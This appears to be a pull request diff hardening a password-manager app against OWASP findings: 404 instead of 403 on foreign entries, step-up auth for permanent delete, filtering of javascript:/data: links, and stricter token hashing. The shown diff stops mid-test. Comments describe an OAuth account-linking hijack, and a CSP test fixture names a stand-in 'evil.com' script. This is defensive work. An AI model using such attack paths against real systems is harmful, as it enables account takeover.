### PR TITLE
fix(security): OWASP batch 3 — Low + Info findings (14 items)

### DIFF
--- a/.env.example
+++ b/.env.example
@@ -64,6 +64,10 @@ DATABASE_URL=postgresql://passwd_app:pass@localhost:5432/passwd_sso
 
 # Comma-separated list of Google Workspace domains allowed to sign in.
 # Leave empty to allow any Google account.
+# SECURITY NOTE: leaving this empty enables Account Linking — if an attacker holds
+# a Google account with the same email as an existing user, they can hijack the
+# account via OAuth callback. Set this to the IdP-controlled domains in production
+# to lock down the attack.
 # GOOGLE_WORKSPACE_DOMAINS=example.com,partner.example.com
 
 # OIDC client ID registered in BoxyHQ SAML Jackson.

--- a/docs/operations/alerts.md
+++ b/docs/operations/alerts.md
@@ -93,3 +93,29 @@ Strip the following fields before storage if your SIEM doesn't
 support hashed identifiers — they are already PII-safe but
 duplicate-data concerns may apply:
 - `identifierHash` (16-hex from auth-failure events)
+
+## External Timestamp Anchors (A09-5)
+
+Audit chain integrity uses the DB clock for `created_at`. A
+compromised DB could rewrite history with consistent timestamps.
+Defense-in-depth: publish the periodic chain anchor to a third-
+party timestamping service so any forged chain past the publish
+point can be disproven by the external record.
+
+The anchor publisher (`src/lib/audit/anchor-manifest.ts`) emits a
+signed manifest at the configured cadence. Routing options to add
+in operator config:
+
+- **Sigstore Rekor** (free, public log): POST the anchor digest
+  to `https://rekor.sigstore.dev/api/v1/log/entries`.
+- **Public NTS / NTP-signed** timestamp (e.g., Cloudflare time):
+  embed an NTS timestamp in the manifest before signing.
+- **AWS QLDB** or **Azure Confidential Ledger**: append-only ledger
+  with cryptographic verification, customer-managed.
+- **Internal SIEM** that uses a separate clock source: forward the
+  manifest event via the standard pino → SIEM path and require the
+  SIEM to record its own ingest timestamp.
+
+Operators MUST pick at least one external destination before
+treating the audit chain as evidentiary. Without external anchoring
+the chain detects tampering within the database boundary only.

--- a/docs/security/crypto-domain-ledger.md
+++ b/docs/security/crypto-domain-ledger.md
@@ -35,6 +35,7 @@ Last verified: 2026-03-07
 | `OK` | `AAD_SCOPE_TEAM_KEY` | Team member key wrapping | teamId, toUserId, keyVersion, wrapVersion | crypto-team.ts |
 | `IK` | `SCOPE_ITEM_KEY` | ItemKey wrapping | teamId, entryId, teamKeyVersion | crypto-aad.ts |
 | `AW` | `SCOPE_ATTACHMENT_WRAP` | Attachment CEK wrapping (mode-2) | entryId, attachmentId, cekKeyVersion, cekWrapAadVersion | crypto-aad.ts |
+| `AR` | `SCOPE_ADMIN_RESET` | Admin-vault-reset email-link token | tenantId, resetId, targetEmailAtInitiate | admin-reset-token-crypto.ts |
 
 ### AAD Binary Format (common)
 

--- a/extension/package-lock.json
+++ b/extension/package-lock.json
@@ -1,12 +1,12 @@
 {
   "name": "passwd-sso-extension",
-  "version": "0.4.43",
+  "version": "0.4.51",
   "lockfileVersion": 3,
   "requires": true,
   "packages": {
     "": {
       "name": "passwd-sso-extension",
-      "version": "0.4.43",
+      "version": "0.4.51",
       "dependencies": {
         "otpauth": "^9.5.0",
         "react": "^19.1.0",

--- a/scripts/env-descriptions.ts
+++ b/scripts/env-descriptions.ts
@@ -157,7 +157,11 @@ export const descriptions: Record<
     order: 3,
     description:
       "Comma-separated list of Google Workspace domains allowed to sign in.\n" +
-      "Leave empty to allow any Google account.",
+      "Leave empty to allow any Google account.\n" +
+      "SECURITY NOTE: leaving this empty enables Account Linking — if an " +
+      "attacker holds a Google account with the same email as an existing " +
+      "user, they can hijack the account via OAuth callback. Set this to " +
+      "the IdP-controlled domains in production to lock down the attack.",
     example: "example.com,partner.example.com",
   },
   AUTH_JACKSON_ID: {

--- a/src/__tests__/api/passwords/attachments.test.ts
+++ b/src/__tests__/api/passwords/attachments.test.ts
@@ -179,12 +179,12 @@ describe("GET /api/passwords/[id]/attachments", () => {
     expect(status).toBe(404);
   });
 
-  it("returns 403 when entry belongs to another user", async () => {
+  it("returns 404 when entry belongs to another user (A01-4: no existence oracle)", async () => {
     mockAuth.mockResolvedValue(DEFAULT_SESSION);
     mockEntryFindUnique.mockResolvedValue({ userId: "other-user" });
     const res = await GET(createGetRequest(), createParams("e1"));
     const { status } = await parseResponse(res);
-    expect(status).toBe(403);
+    expect(status).toBe(404);
   });
 
   it("returns attachments list", async () => {
@@ -240,13 +240,13 @@ describe("POST /api/passwords/[id]/attachments", () => {
     expect(status).toBe(404);
   });
 
-  it("returns 403 when entry belongs to another user", async () => {
+  it("returns 404 when entry belongs to another user (A01-4: no existence oracle)", async () => {
     mockAuth.mockResolvedValue(DEFAULT_SESSION);
     mockEntryFindUnique.mockResolvedValue({ userId: "other-user" });
     const req = createFormDataRequest(validFormFields());
     const res = await POST(req, createParams("e1"));
     const { status } = await parseResponse(res);
-    expect(status).toBe(403);
+    expect(status).toBe(404);
   });
 
   it("returns 400 when attachment limit exceeded", async () => {

--- a/src/__tests__/api/passwords/history-reencrypt.test.ts
+++ b/src/__tests__/api/passwords/history-reencrypt.test.ts
@@ -76,13 +76,13 @@ describe("GET /api/passwords/[id]/history/[historyId]", () => {
     expect(status).toBe(404);
   });
 
-  it("returns 403 when entry belongs to another user", async () => {
+  it("returns 404 when entry belongs to another user (A01-4: no existence oracle)", async () => {
     mockAuth.mockResolvedValue(DEFAULT_SESSION);
     mockEntryFindUnique.mockResolvedValue({ userId: "other-user" });
     const req = createRequest("GET", "http://localhost/api/passwords/p1/history/h1");
     const res = await GET(req, createParams({ id: "p1", historyId: "h1" }));
     const { status } = await parseResponse(res);
-    expect(status).toBe(403);
+    expect(status).toBe(404);
   });
 
   it("returns individual history entry", async () => {
@@ -151,7 +151,7 @@ describe("PATCH /api/passwords/[id]/history/[historyId]", () => {
     expect(status).toBe(404);
   });
 
-  it("returns 403 when entry belongs to another user", async () => {
+  it("returns 404 when entry belongs to another user (A01-4: no existence oracle)", async () => {
     mockAuth.mockResolvedValue(DEFAULT_SESSION);
     mockEntryFindUnique.mockResolvedValue({ userId: "other-user" });
     const res = await PATCH(
@@ -165,7 +165,7 @@ describe("PATCH /api/passwords/[id]/history/[historyId]", () => {
       createParams({ id: "p1", historyId: "h1" }),
     );
     const { status } = await parseResponse(res);
-    expect(status).toBe(403);
+    expect(status).toBe(404);
   });
 
   it("returns 400 for invalid authTag format", async () => {

--- a/src/__tests__/api/passwords/history-restore.test.ts
+++ b/src/__tests__/api/passwords/history-restore.test.ts
@@ -59,7 +59,7 @@ describe("POST /api/passwords/[id]/history/[historyId]/restore", () => {
     expect(json.error).toBe("NOT_FOUND");
   });
 
-  it("returns 403 when entry belongs to another user", async () => {
+  it("returns 404 when entry belongs to another user (A01-4: no existence oracle)", async () => {
     mockAuth.mockResolvedValue(DEFAULT_SESSION);
     mockEntryFindUnique.mockResolvedValue({ id: "p1", userId: "other-user" });
     const req = createRequest("POST", "http://localhost/api/passwords/p1/history/h1/restore");

--- a/src/__tests__/api/passwords/history.test.ts
+++ b/src/__tests__/api/passwords/history.test.ts
@@ -46,7 +46,7 @@ describe("GET /api/passwords/[id]/history", () => {
     expect(json.error).toBe("NOT_FOUND");
   });
 
-  it("returns 403 when entry belongs to another user", async () => {
+  it("returns 404 when entry belongs to another user (A01-4: no existence oracle)", async () => {
     mockAuth.mockResolvedValue(DEFAULT_SESSION);
     mockFindUnique.mockResolvedValue({ userId: "other-user" });
     const req = createRequest("GET", "http://localhost/api/passwords/p1/history");

--- a/src/__tests__/api/passwords/write-scope.test.ts
+++ b/src/__tests__/api/passwords/write-scope.test.ts
@@ -268,7 +268,7 @@ describe("passwords:write scope", () => {
       expect(status).toBe(200);
     });
 
-    it("returns 403 when entry belongs to another user", async () => {
+    it("returns 404 when entry belongs to another user (A01-4: no existence oracle)", async () => {
       mockAuthOrToken.mockResolvedValue({ type: "token", userId: "user-1", scopes: ["passwords:write"] });
       mockFindUnique.mockResolvedValue({
         id: "p1",
@@ -281,8 +281,8 @@ describe("passwords:write scope", () => {
       });
       const res = await PUT(req, createParams({ id: "p1" }));
       const { status, json } = await parseResponse(res);
-      expect(status).toBe(403);
-      expect(json.error).toBe("FORBIDDEN");
+      expect(status).toBe(404);
+      expect(json.error).toBe("NOT_FOUND");
     });
   });
 });

--- a/src/app/api/csp-report/route.test.ts
+++ b/src/app/api/csp-report/route.test.ts
@@ -65,16 +65,17 @@ describe("POST /api/csp-report", () => {
     );
     expect(res.status).toBe(204);
     expect(mockWarn).toHaveBeenCalledWith(
-      {
-        cspReport: {
+      expect.objectContaining({
+        _logType: "csp.violation",
+        cspReport: expect.objectContaining({
           "document-uri": "https://example.com/page",
           "blocked-uri": "https://evil.com/script.js",
           "violated-directive": "script-src 'self'",
           "effective-directive": "script-src",
           disposition: "enforce",
           "status-code": 200,
-        },
-      },
+        }),
+      }),
       "csp.violation",
     );
     // referrer and script-sample are NOT in the sanitized output
@@ -113,15 +114,16 @@ describe("POST /api/csp-report", () => {
     );
     expect(res.status).toBe(204);
     expect(mockWarn).toHaveBeenCalledWith(
-      {
-        cspReport: {
+      expect.objectContaining({
+        _logType: "csp.violation",
+        cspReport: expect.objectContaining({
           type: "csp-violation",
           documentURL: "https://example.com/page",
           blockedURL: "https://cdn.example.com/lib.js",
           effectiveDirective: "script-src",
           disposition: "enforce",
-        },
-      },
+        }),
+      }),
       "csp.violation",
     );
   });

--- a/src/app/api/csp-report/route.ts
+++ b/src/app/api/csp-report/route.ts
@@ -102,7 +102,12 @@ async function handlePOST(request: NextRequest) {
     if (body) {
       const sanitized = sanitizeCspReport(body);
       if (sanitized) {
-        getLogger().warn({ cspReport: sanitized }, "csp.violation");
+        // A09-6: _logType field matches docs/operations/alerts.md SIEM
+        // queries (Datadog: `{ _logType="csp.violation" } | rate`).
+        getLogger().warn(
+          { cspReport: sanitized, _logType: "csp.violation" },
+          "csp.violation",
+        );
       }
     }
   }

--- a/src/app/api/passwords/[id]/attachments/route.test.ts
+++ b/src/app/api/passwords/[id]/attachments/route.test.ts
@@ -170,13 +170,13 @@ describe("GET /api/passwords/[id]/attachments", () => {
     expect(res.status).toBe(404);
   });
 
-  it("returns 403 when entry belongs to another user", async () => {
+  it("returns 404 (A01-4) when entry belongs to another user", async () => {
     mockPrismaPasswordEntry.findUnique.mockResolvedValue({ userId: "other-user" });
     const res = await GET(
       createGetRequest("http://localhost:3000/api/passwords/pw-1/attachments"),
       createParams("pw-1")
     );
-    expect(res.status).toBe(403);
+    expect(res.status).toBe(404);
   });
 
   it("returns attachment list", async () => {

--- a/src/app/api/passwords/[id]/attachments/route.ts
+++ b/src/app/api/passwords/[id]/attachments/route.ts
@@ -53,7 +53,8 @@ async function handleGET(
     return notFound();
   }
   if (entry.userId !== session.user.id) {
-    return forbidden();
+    // A01-4: collapse 403 → 404 to remove existence oracle.
+    return notFound();
   }
 
   const attachments = await withUserTenantRls(session.user.id, async () =>
@@ -96,7 +97,8 @@ async function handlePOST(
     return notFound();
   }
   if (entry.userId !== session.user.id) {
-    return forbidden();
+    // A01-4: collapse 403 → 404 to remove existence oracle.
+    return notFound();
   }
 
   const rl = await attachmentUploadLimiter.check(`rl:attachment_upload:${session.user.id}`);

--- a/src/app/api/passwords/[id]/history/[historyId]/route.test.ts
+++ b/src/app/api/passwords/[id]/history/[historyId]/route.test.ts
@@ -116,10 +116,10 @@ describe("GET /api/passwords/[id]/history/[historyId]", () => {
     expect(res.status).toBe(404);
   });
 
-  it("returns 403 when entry belongs to another user", async () => {
+  it("returns 404 (A01-4) when entry belongs to another user", async () => {
     mockPrismaPasswordEntry.findUnique.mockResolvedValue({ userId: "other-user" });
     const res = await GET(createRequest("GET", makeUrl()), makeParams());
-    expect(res.status).toBe(403);
+    expect(res.status).toBe(404);
   });
 
   it("returns 404 when history not found", async () => {

--- a/src/app/api/passwords/[id]/history/[historyId]/route.ts
+++ b/src/app/api/passwords/[id]/history/[historyId]/route.ts
@@ -44,7 +44,8 @@ async function handleGET(
     return notFound();
   }
   if (entry.userId !== session.user.id) {
-    return forbidden();
+    // A01-4: collapse 403 → 404 to remove existence oracle.
+    return notFound();
   }
 
   if (!history || history.entryId !== id) {
@@ -104,7 +105,8 @@ async function handlePATCH(
     return notFound();
   }
   if (entry.userId !== session.user.id) {
-    return forbidden();
+    // A01-4: collapse 403 → 404 to remove existence oracle.
+    return notFound();
   }
 
   if (!history || history.entryId !== id) {

--- a/src/app/api/passwords/[id]/route.test.ts
+++ b/src/app/api/passwords/[id]/route.test.ts
@@ -29,6 +29,11 @@ vi.mock("@/lib/security/rate-limit", () => ({
   createRateLimiter: () => ({ check: mockRateLimiterCheck, clear: vi.fn() }),
 }));
 vi.mock("@/lib/auth/session/check-auth", () => ({ checkAuth: mockCheckAuth }));
+// A01-3: permanent=true DELETE gates on requireRecentCurrentAuthMethod.
+// Default: null (allow). Tests for the rejection path override.
+vi.mock("@/lib/auth/session/recent-current-auth-method", () => ({
+  requireRecentCurrentAuthMethod: vi.fn().mockResolvedValue(null),
+}));
 vi.mock("@/lib/prisma", () => ({
   prisma: {
     passwordEntry: mockPrismaPasswordEntry,
@@ -151,13 +156,13 @@ describe("GET /api/passwords/[id]", () => {
     expect(res.status).toBe(404);
   });
 
-  it("returns 403 when entry belongs to another user", async () => {
+  it("returns 404 (A01-4) when entry belongs to another user", async () => {
     mockPrismaPasswordEntry.findUnique.mockResolvedValue({ ...ownedEntry, userId: "other-user" });
     const res = await GET(
       createRequest("GET", `http://localhost:3000/api/passwords/${PW_ID}`),
       createParams({ id: PW_ID }),
     );
-    expect(res.status).toBe(403);
+    expect(res.status).toBe(404);
   });
 
   it("returns password entry with encrypted data and entryType", async () => {
@@ -315,13 +320,13 @@ describe("PUT /api/passwords/[id]", () => {
     expect(res.status).toBe(404);
   });
 
-  it("returns 403 when entry belongs to another user", async () => {
+  it("returns 404 (A01-4) when entry belongs to another user", async () => {
     mockPrismaPasswordEntry.findUnique.mockResolvedValue({ ...ownedEntry, userId: "other-user" });
     const res = await PUT(
       createRequest("PUT", `http://localhost:3000/api/passwords/${PW_ID}`, { body: updateBody }),
       createParams({ id: PW_ID }),
     );
-    expect(res.status).toBe(403);
+    expect(res.status).toBe(404);
   });
 
   it("updates password entry successfully", async () => {
@@ -732,13 +737,13 @@ describe("DELETE /api/passwords/[id]", () => {
     expect(res.status).toBe(404);
   });
 
-  it("returns 403 when entry belongs to another user", async () => {
+  it("returns 404 (A01-4) when entry belongs to another user", async () => {
     mockPrismaPasswordEntry.findUnique.mockResolvedValue({ ...ownedEntry, userId: "other-user" });
     const res = await DELETE(
       createRequest("DELETE", `http://localhost:3000/api/passwords/${PW_ID}`),
       createParams({ id: PW_ID }),
     );
-    expect(res.status).toBe(403);
+    expect(res.status).toBe(404);
   });
 
   it("soft deletes (moves to trash) by default", async () => {

--- a/src/app/api/passwords/[id]/route.ts
+++ b/src/app/api/passwords/[id]/route.ts
@@ -11,6 +11,7 @@ import { createRateLimiter } from "@/lib/security/rate-limit";
 import { withRequestLog } from "@/lib/http/with-request-log";
 import { EXTENSION_TOKEN_SCOPE, AUDIT_TARGET_TYPE, AUDIT_ACTION } from "@/lib/constants";
 import { withUserTenantRls } from "@/lib/tenant-context";
+import { requireRecentCurrentAuthMethod } from "@/lib/auth/session/recent-current-auth-method";
 
 const getLimiter = createRateLimiter({ windowMs: 60_000, max: 60 });
 const updateLimiter = createRateLimiter({ windowMs: 60_000, max: 30 });
@@ -241,6 +242,15 @@ async function handleDELETE(
   const { id } = await params;
   const { searchParams } = new URL(req.url);
   const permanent = searchParams.get("permanent") === "true";
+
+  // A01-3: permanent delete is unrecoverable. Require fresh credential
+  // possession (15-min step-up window) so a leaked session cookie alone
+  // cannot wipe entries. Soft-delete (trash) remains gated only by
+  // session — the trash itself acts as a recovery window.
+  if (permanent) {
+    const stepUp = await requireRecentCurrentAuthMethod(req);
+    if (stepUp) return stepUp;
+  }
 
   const existing = await withUserTenantRls(userId, async () =>
     prisma.passwordEntry.findUnique({

--- a/src/app/api/passwords/[id]/route.ts
+++ b/src/app/api/passwords/[id]/route.ts
@@ -41,7 +41,9 @@ async function handleGET(
   }
 
   if (entry.userId !== userId) {
-    return forbidden();
+    // A01-4: 403 vs 404 difference leaks "ID exists in tenant" oracle to
+    // attacker. RLS should already null this branch; defense-in-depth.
+    return notFound();
   }
 
   return NextResponse.json({
@@ -104,7 +106,8 @@ async function handlePUT(
   }
 
   if (existing.userId !== userId) {
-    return forbidden();
+    // A01-4: collapse 403 → 404 to remove existence oracle.
+    return notFound();
   }
 
   const result = await parseBody(req, updateE2EPasswordSchema);
@@ -251,7 +254,8 @@ async function handleDELETE(
   }
 
   if (existing.userId !== userId) {
-    return forbidden();
+    // A01-4: collapse 403 → 404 to remove existence oracle.
+    return notFound();
   }
 
   if (permanent) {

--- a/src/auth.config.ts
+++ b/src/auth.config.ts
@@ -146,6 +146,16 @@ export default {
         // cookie-bearing mutating requests, src/lib/proxy/csrf-gate.ts).
         sameSite: "lax" as const,
         secure: useSecureCookies,
+        // A07-6 (CHIPS): partitioned cookies are isolated per top-level
+        // site context. Opt-in via env because the app does NOT use
+        // third-party iframes today; partitioned has no effect outside
+        // iframe contexts but bumps the browser-side defense ceiling if
+        // a future embed path is added. Requires Secure (already set
+        // when useSecureCookies). Browsers without CHIPS support ignore
+        // the flag silently.
+        ...(useSecureCookies && process.env.COOKIE_PARTITIONED === "true"
+          ? { partitioned: true as const }
+          : {}),
       },
     },
   },

--- a/src/components/passwords/detail/sections/login-section.tsx
+++ b/src/components/passwords/detail/sections/login-section.tsx
@@ -11,6 +11,7 @@ import { TOTPField } from "../../shared/totp-field";
 import { useRevealTimeout, useRevealSet } from "@/hooks/vault/use-reveal-timeout";
 import type { RequireVerificationFn } from "@/hooks/vault/use-reveal-timeout";
 import { CUSTOM_FIELD_TYPE } from "@/lib/constants";
+import { isSafeHref } from "@/lib/security/safe-href";
 import { formatDateTime, formatDate } from "@/lib/format/format-datetime";
 import type { InlineDetailData } from "@/types/entry";
 import type { CreateGuardedGetterFn } from "./types";
@@ -89,14 +90,19 @@ export function LoginSection({ data, requireVerification, createGuardedGetter }:
             <Favicon host={data.urlHost} size={12} className="shrink-0" /> {t("url")}
           </label>
           <div className="flex items-center gap-2">
-            <a
-              href={data.url}
-              target="_blank"
-              rel="noopener noreferrer"
-              className="text-sm text-blue-600 hover:underline"
-            >
-              {data.url}
-            </a>
+            {isSafeHref(data.url) ? (
+              <a
+                href={data.url}
+                target="_blank"
+                rel="noopener noreferrer"
+                className="text-sm text-blue-600 hover:underline"
+              >
+                {data.url}
+              </a>
+            ) : (
+              // A03-1: javascript: / data: etc. — render as plain text.
+              <span className="text-sm break-all">{data.url}</span>
+            )}
             <CopyButton getValue={() => data.url!} />
           </div>
         </div>
@@ -121,14 +127,18 @@ export function LoginSection({ data, requireVerification, createGuardedGetter }:
             </label>
             <div className="flex items-center gap-2">
               {field.type === CUSTOM_FIELD_TYPE.URL ? (
-                <a
-                  href={field.value}
-                  target="_blank"
-                  rel="noopener noreferrer"
-                  className="text-sm text-blue-600 hover:underline"
-                >
-                  {field.value}
-                </a>
+                isSafeHref(field.value) ? (
+                  <a
+                    href={field.value}
+                    target="_blank"
+                    rel="noopener noreferrer"
+                    className="text-sm text-blue-600 hover:underline"
+                  >
+                    {field.value}
+                  </a>
+                ) : (
+                  <span className="text-sm break-all">{field.value}</span>
+                )
               ) : field.type === CUSTOM_FIELD_TYPE.HIDDEN ? (
                 <>
                   <span className="font-mono text-sm">

--- a/src/components/share/share-entry-view.tsx
+++ b/src/components/share/share-entry-view.tsx
@@ -22,14 +22,7 @@ import {
 } from "lucide-react";
 import { formatDateTime, formatDate } from "@/lib/format/format-datetime";
 import { REVEAL_TIMEOUT_MS } from "@/lib/constants";
-
-function isSafeHref(url: string): boolean {
-  try {
-    return ["http:", "https:"].includes(new URL(url).protocol);
-  } catch {
-    return false;
-  }
-}
+import { isSafeHref } from "@/lib/security/safe-href";
 
 const ENTRY_TYPE_ICONS: Record<string, React.ReactNode> = {
   [ENTRY_TYPE.LOGIN]: <KeyRound className="h-5 w-5" />,

--- a/src/lib/auth/session/user-session-invalidation.ts
+++ b/src/lib/auth/session/user-session-invalidation.ts
@@ -1,7 +1,9 @@
+import * as Sentry from "@sentry/nextjs";
 import { prisma } from "@/lib/prisma";
 import { withBypassRls, BYPASS_PURPOSE } from "@/lib/tenant-rls";
 import { invalidateCachedSessions } from "@/lib/auth/session/session-cache-helpers";
 import { invalidateCachedSessionsBulk } from "@/lib/auth/session/session-cache";
+import { getLogger } from "@/lib/logger";
 
 /**
  * Options for {@link invalidateUserSessions}.
@@ -171,6 +173,36 @@ export async function invalidateUserSessions(
         targetSessions.map((s) => s.sessionToken),
       );
       cacheTombstoneFailures = cacheResult.failed;
+    }
+
+    // A07-5: failures previously surfaced only in the per-caller audit
+    // metadata. Operators have to grep audit logs to notice a Redis
+    // outage during a revocation. Capture to Sentry centrally so it
+    // reaches the standard on-call channel.
+    if (cacheTombstoneFailures > 0) {
+      getLogger().error(
+        {
+          userId,
+          failures: cacheTombstoneFailures,
+          reason: options.reason ?? null,
+          _logType: "session.cache_tombstone_failures",
+        },
+        "session.cache_tombstone_failures",
+      );
+      Sentry.captureMessage(
+        "session cache tombstone failures during invalidateUserSessions",
+        {
+          level: "error",
+          tags: {
+            reason: options.reason ?? "unspecified",
+          },
+          extra: {
+            userId,
+            failures: cacheTombstoneFailures,
+            tenantScope: allTenants ? "all" : options.tenantId,
+          },
+        },
+      );
     }
 
     return {

--- a/src/lib/crypto/crypto-server.test.ts
+++ b/src/lib/crypto/crypto-server.test.ts
@@ -21,12 +21,8 @@ import {
 import { randomBytes } from "node:crypto";
 
 describe("crypto-server", () => {
-  const originalMasterKey = process.env.SHARE_MASTER_KEY;
-
-  afterAll(() => {
-    // Restore original env
-    process.env.SHARE_MASTER_KEY = originalMasterKey;
-  });
+  // Pre-pr hygiene: vi.stubEnv is auto-unstubbed in tests/setup.ts afterEach.
+  // No manual restore needed.
 
   describe("encryptServerData / decryptServerData", () => {
     it("roundtrips correctly", () => {
@@ -190,17 +186,17 @@ describe("crypto-server", () => {
     });
 
     it("getCurrentMasterKeyVersion reads env", () => {
-      process.env.SHARE_MASTER_KEY_CURRENT_VERSION = "2";
+      vi.stubEnv("SHARE_MASTER_KEY_CURRENT_VERSION", "2");
       expect(getCurrentMasterKeyVersion()).toBe(2);
     });
 
     it("getCurrentMasterKeyVersion throws for invalid value", () => {
-      process.env.SHARE_MASTER_KEY_CURRENT_VERSION = "abc";
+      vi.stubEnv("SHARE_MASTER_KEY_CURRENT_VERSION", "abc");
       expect(() => getCurrentMasterKeyVersion()).toThrow("positive integer");
     });
 
     it("getCurrentMasterKeyVersion throws for zero", () => {
-      process.env.SHARE_MASTER_KEY_CURRENT_VERSION = "0";
+      vi.stubEnv("SHARE_MASTER_KEY_CURRENT_VERSION", "0");
       expect(() => getCurrentMasterKeyVersion()).toThrow("positive integer");
     });
 
@@ -218,13 +214,13 @@ describe("crypto-server", () => {
 
     it("getMasterKeyByVersion V1 falls back to SHARE_MASTER_KEY", () => {
       delete process.env.SHARE_MASTER_KEY_V1;
-      process.env.SHARE_MASTER_KEY = V1_KEY;
+      vi.stubEnv("SHARE_MASTER_KEY", V1_KEY);
       const key = getMasterKeyByVersion(1);
       expect(key.toString("hex")).toBe(V1_KEY);
     });
 
     it("getMasterKeyByVersion V1 prefers SHARE_MASTER_KEY_V1", () => {
-      process.env.SHARE_MASTER_KEY = V1_KEY;
+      vi.stubEnv("SHARE_MASTER_KEY", V1_KEY);
       process.env.SHARE_MASTER_KEY_V1 = V2_KEY; // different key
       const key = getMasterKeyByVersion(1);
       expect(key.toString("hex")).toBe(V2_KEY);
@@ -245,7 +241,7 @@ describe("crypto-server", () => {
     });
 
     it("getMasterKeyByVersion throws for invalid hex", () => {
-      process.env.SHARE_MASTER_KEY = "abcd";
+      vi.stubEnv("SHARE_MASTER_KEY", "abcd");
       delete process.env.SHARE_MASTER_KEY_V1;
       expect(() => getMasterKeyByVersion(1)).toThrow(
         "Master key for version 1 not found or invalid"
@@ -254,7 +250,7 @@ describe("crypto-server", () => {
 
     it("encryptShareData returns masterKeyVersion matching current", () => {
       process.env.SHARE_MASTER_KEY_V2 = V2_KEY;
-      process.env.SHARE_MASTER_KEY_CURRENT_VERSION = "2";
+      vi.stubEnv("SHARE_MASTER_KEY_CURRENT_VERSION", "2");
       const encrypted = encryptShareData("test");
       expect(encrypted.masterKeyVersion).toBe(2);
     });
@@ -389,18 +385,18 @@ describe("crypto-server", () => {
   describe("hmacVerifier — getVerifierPepper env handling", () => {
     it("uses VERIFIER_PEPPER_KEY when set", () => {
       const saved = process.env.VERIFIER_PEPPER_KEY;
-      process.env.VERIFIER_PEPPER_KEY = "b".repeat(64);
+      vi.stubEnv("VERIFIER_PEPPER_KEY", "b".repeat(64));
 
       const result = hmacVerifier("a".repeat(64));
       expect(result).toHaveLength(64);
 
       // Change pepper → different HMAC
-      process.env.VERIFIER_PEPPER_KEY = "c".repeat(64);
+      vi.stubEnv("VERIFIER_PEPPER_KEY", "c".repeat(64));
       const result2 = hmacVerifier("a".repeat(64));
       expect(result).not.toBe(result2);
 
       if (saved) {
-        process.env.VERIFIER_PEPPER_KEY = saved;
+        vi.stubEnv("VERIFIER_PEPPER_KEY", saved);
       } else {
         delete process.env.VERIFIER_PEPPER_KEY;
       }
@@ -408,14 +404,14 @@ describe("crypto-server", () => {
 
     it("throws when VERIFIER_PEPPER_KEY is invalid hex", () => {
       const saved = process.env.VERIFIER_PEPPER_KEY;
-      process.env.VERIFIER_PEPPER_KEY = "not-valid-hex";
+      vi.stubEnv("VERIFIER_PEPPER_KEY", "not-valid-hex");
 
       expect(() => hmacVerifier("a".repeat(64))).toThrow(
         "VERIFIER_PEPPER_KEY must be a 64-char hex string"
       );
 
       if (saved) {
-        process.env.VERIFIER_PEPPER_KEY = saved;
+        vi.stubEnv("VERIFIER_PEPPER_KEY", saved);
       } else {
         delete process.env.VERIFIER_PEPPER_KEY;
       }
@@ -433,7 +429,7 @@ describe("crypto-server", () => {
 
       (process.env as Record<string, string | undefined>).NODE_ENV = savedEnv;
       if (savedPepper) {
-        process.env.VERIFIER_PEPPER_KEY = savedPepper;
+        vi.stubEnv("VERIFIER_PEPPER_KEY", savedPepper);
       }
     });
 
@@ -446,7 +442,7 @@ describe("crypto-server", () => {
       expect(result).toHaveLength(64);
 
       if (savedPepper) {
-        process.env.VERIFIER_PEPPER_KEY = savedPepper;
+        vi.stubEnv("VERIFIER_PEPPER_KEY", savedPepper);
       }
     });
   });

--- a/src/lib/crypto/crypto-server.test.ts
+++ b/src/lib/crypto/crypto-server.test.ts
@@ -555,16 +555,26 @@ describe("crypto-server", () => {
     });
 
     it("hash is deterministic for same password", () => {
-      const pw = "test-password-123";
+      // A02-6: hashAccessPassword enforces 43-char generated-token length;
+      // use generateAccessPassword to produce a valid fixture.
+      const pw = generateAccessPassword();
       const { hash: h1 } = hashAccessPassword(pw);
       const { hash: h2 } = hashAccessPassword(pw);
       expect(h1).toBe(h2);
     });
 
     it("different passwords produce different hashes", () => {
-      const { hash: h1 } = hashAccessPassword("password-a");
-      const { hash: h2 } = hashAccessPassword("password-b");
+      const pw1 = generateAccessPassword();
+      const pw2 = generateAccessPassword();
+      const { hash: h1 } = hashAccessPassword(pw1);
+      const { hash: h2 } = hashAccessPassword(pw2);
       expect(h1).not.toBe(h2);
+    });
+
+    it("A02-6: throws when input is not a 43-char generated token", () => {
+      expect(() => hashAccessPassword("short")).toThrow(/expected 43-char/);
+      expect(() => hashAccessPassword("a".repeat(42))).toThrow(/expected 43-char/);
+      expect(() => hashAccessPassword("a".repeat(44))).toThrow(/expected 43-char/);
     });
 
     it("hashAccessPassword returns { hash, version } object", () => {

--- a/src/lib/crypto/crypto-server.ts
+++ b/src/lib/crypto/crypto-server.ts
@@ -216,17 +216,37 @@ export function generateAccessPassword(): string {
 }
 
 /**
+ * Length emitted by {@link generateAccessPassword}: ceil(32 * 8 / 6) = 43.
+ * A02-6: enforced at runtime in hashAccessPassword so a future caller
+ * cannot accidentally pass a user-chosen (low-entropy) password into the
+ * fast-hash path.
+ */
+const ACCESS_PASSWORD_LENGTH = 43;
+
+/**
  * Hash an access password for storage.
  * Pre-hashes with SHA-256 to produce 64-char hex required by hmacVerifier.
  *
  * NOTE: SHA-256 is intentional here — the input is a server-generated
  * 256-bit random token (randomBytes(32)), not a user-chosen password.
  * A slow KDF (bcrypt/argon2) is unnecessary for high-entropy secrets.
+ *
+ * A02-6 invariant: throws if the input length doesn't match
+ * generateAccessPassword's output (43 chars base64url). This guards
+ * against a future caller substituting a user-chosen low-entropy
+ * password into this fast-hash path, which would be offline-dictionary-
+ * attackable. Pair with generateAccessPassword at the call site.
  */
 export function hashAccessPassword(
   password: string,
   version: number = getCurrentVerifierVersion()
 ): { hash: string; version: number } {
+  if (password.length !== ACCESS_PASSWORD_LENGTH) {
+    throw new Error(
+      `hashAccessPassword: expected ${ACCESS_PASSWORD_LENGTH}-char generated token, got length ${password.length}. ` +
+        `User-chosen passwords MUST go through a slow KDF (bcrypt/argon2), not this fast-hash path.`,
+    );
+  }
   const digest = createHash("sha256").update(password).digest("hex");
   return { hash: hmacVerifier(digest, version), version };
 }

--- a/src/lib/crypto/envelope.test.ts
+++ b/src/lib/crypto/envelope.test.ts
@@ -166,6 +166,28 @@ describe("envelope", () => {
       const ct = encryptWithKey("p", 0, SENTINEL_KEY, SENTINEL_AAD_A);
       expect(parseEnvelope(ct).version).toBe(0);
     });
+
+    // A08-4: Number() is too tolerant. Verify rejection of formats that
+    // would alias to a valid integer version.
+    it("rejects '1.0' (decimal point)", () => {
